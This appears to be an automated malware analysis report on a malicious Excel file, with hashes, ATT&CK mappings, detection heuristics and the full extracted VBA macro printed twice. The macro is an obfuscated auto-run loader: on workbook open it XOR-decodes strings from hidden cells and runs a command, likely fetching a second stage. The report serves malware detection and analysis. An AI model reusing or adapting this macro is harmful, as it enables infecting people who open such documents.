Office (OLE) / .XLS malware analysis — malicious · f835c2479c49b48f

MALICIOUS

Office (OLE) / .XLS

41.0 KB Created: 2023-04-17 15:29:16 Authoring application: Microsoft Excel First seen: 2023-04-19

MD5: 03b8ee86e2c20dece50fbe6cceaa383d SHA-1: 6217ec84a2ce57de29e479622cc216c4a4d7384a SHA-256: f835c2479c49b48fa7af9319d01672c4d8cdb71cc008d82a23a7573bd5d124b8

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample is a malicious Excel file containing VBA macros. The Workbook_Open macro is triggered, which then calls a Donation subroutine. This subroutine uses GetObject and CreateObject to instantiate an object, and then runs a command constructed from values read from specific cells in the 'o38a' sheet. The reconstructed command is likely responsible for downloading and executing a second-stage payload, indicated by the high-severity heuristics for CreateObject, GetObject, and p-code auto-execution.

Heuristics 5

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set Plugin = GetObject(Berkeley).CreateObject(Shoulder)
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set Plugin = GetObject(Berkeley).CreateObject(Shoulder)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
           Sub Workbook_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4719 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4719 bytes
SHA-256: `2cc60a2ac2a96dfae26a53bb2f1a4d09457544c64ffd95e0889affe8ef2a33e0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Private Raising As String Private Equation As String Private Surveillance As String Private CorreCtly As String Private Plugin As Object Private Sub Donation() Dim Berkeley As String, Hispanic As String, RogeRs As String, Shoulder As String GoTo Hispanic Railway: Berkeley = Herein(Raising): Hispanic = Herein(Equation): RogeRs = Herein(Surveillance): Shoulder = Herein(CorreCtly) Set Plugin = GetObject(Berkeley).CreateObject(Shoulder) GoTo Wisdom Hispanic: Raising = Sheets("o38a").Range("H152").Value: Equation = Sheets("o38a").Range("E107").Value: Surveillance = Sheets("o38a").Range("J159").Value: CorreCtly = Sheets("o38a").Range("G193").Value GoTo Railway Wisdom: Plugin.Run RogeRs & " " & Hispanic, 0 End Sub Sub Workbook_Open() GoTo Madonna Dim Northeast As String Northeast = InputBox("enter the first number") Dim Decline As String Decline = InputBox("enter the last number") MsgBox Northeast MsgBox Decline Madonna: If Northeast = "" Then Donation End If End Sub Private Function Thesis(ByVal Workforce As String) As Variant Dim Belief() As Byte, i As Long, Athens As Integer i = 0: ReDim Belief(0 To (Len(Workforce) / 2)) As Byte Northeast: If i < Len(Workforce) Then Athens = Athens + 1 Belief(Athens - 1) = Chr((7 * 2) + (((10 - 2) + 4) * 2)) & "H" & Mid(Workforce, i + 1, 2) i = i + 2 GoTo Northeast Else GoTo Decline End If Decline: Thesis = Belief End Function Private Function Herein(ByVal NutteN As String) As Variant Dim EnvironmEnts As Long: EnvironmEnts = 0: Dim Devil() As Byte: Dim StringS() As Byte, Belief As String, Athens As Integer StringS = "g31657dbfc" GoTo SwitcheS ObligatiOns: Dim Decline As String Decline = InputBox("put calc number") MsgBox Decline TableT: If EnvironmEnts < UBound(Devil) Then Athens = EnvironmEnts Mod (10) GoTo Berkeley Hispanic: Belief = Belief & Chr(Devil(EnvironmEnts)) EnvironmEnts = EnvironmEnts + 1 GoTo TableT Else GoTo Meals End If Workforce: MsgBox "err -52525" Dim Northeast As String Northeast = InputBox("") MsgBox Northeast Meals: Herein = Belief Exit Function SwitcheS: Devil = Thesis(NutteN) GoTo TableT Berkeley: Devil(EnvironmEnts) = Abs(Devil(EnvironmEnts) Xor StringS(Athens * 2)) GoTo Hispanic End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 2cc60a2ac2a96dfae26a53bb2f1a4d09457544c64ffd95e0889affe8ef2a33e0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit





                                                





                                        Private Raising As String
Private Equation As String





             






                                        Private Surveillance As String
Private CorreCtly As String
Private Plugin As Object

Private Sub Donation()







              







                 Dim Berkeley As String, Hispanic As String, RogeRs As String, Shoulder As String







                                                                GoTo Hispanic





Railway:
Berkeley = Herein(Raising): Hispanic = Herein(Equation): RogeRs = Herein(Surveillance): Shoulder = Herein(CorreCtly)
Set Plugin = GetObject(Berkeley).CreateObject(Shoulder)






                GoTo Wisdom
Hispanic:
Raising = Sheets("o38a").Range("H152").Value: Equation = Sheets("o38a").Range("E107").Value: Surveillance = Sheets("o38a").Range("J159").Value: CorreCtly = Sheets("o38a").Range("G193").Value
GoTo Railway
Wisdom:





                                                        Plugin.Run RogeRs & " " & Hispanic, 0
End Sub








                                                                            






           Sub Workbook_Open()
GoTo Madonna





                Dim Northeast As String






          Northeast = InputBox("enter the first number")
Dim Decline As String








                                                            Decline = InputBox("enter the last number")







                                                    MsgBox Northeast







          MsgBox Decline
Madonna:





                                                                        If Northeast = "" Then
Donation






                                            End If
End Sub
Private Function Thesis(ByVal Workforce As String) As Variant








                   Dim Belief() As Byte, i As Long, Athens As Integer
i = 0: ReDim Belief(0 To (Len(Workforce) / 2)) As Byte





Northeast:





             If i < Len(Workforce) Then







                                                Athens = Athens + 1
Belief(Athens - 1) = Chr((7 * 2) + (((10 - 2) + 4) * 2)) & "H" & Mid(Workforce, i + 1, 2)






                                                                        i = i + 2
GoTo Northeast
Else





                                                                    





            GoTo Decline





                                                    End If
Decline:
Thesis = Belief
End Function
Private Function Herein(ByVal NutteN As String) As Variant
Dim EnvironmEnts As Long: EnvironmEnts = 0: Dim Devil() As Byte: Dim StringS() As Byte, Belief As String, Athens As Integer
StringS = "g31657dbfc"







                                        







                 GoTo SwitcheS








ObligatiOns:







                                                                        Dim Decline As String
Decline = InputBox("put calc number")
MsgBox Decline







TableT:
If EnvironmEnts < UBound(Devil) Then
Athens = EnvironmEnts Mod (10)
GoTo Berkeley
Hispanic:







                 




                                                                            Belief = Belief & Chr(Devil(EnvironmEnts))
EnvironmEnts = EnvironmEnts + 1
GoTo TableT





                Else







                  GoTo Meals
End If





Workforce:
MsgBox "err -52525"







                                                            Dim Northeast As String
Northeast = InputBox("")
MsgBox Northeast
Meals:
Herein = Belief







           Exit Function
SwitcheS:
Devil = Thesis(NutteN)
GoTo TableT
Berkeley:
Devil(EnvironmEnts) = Abs(Devil(EnvironmEnts) Xor StringS(Athens * 2))





                                                        GoTo Hispanic
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.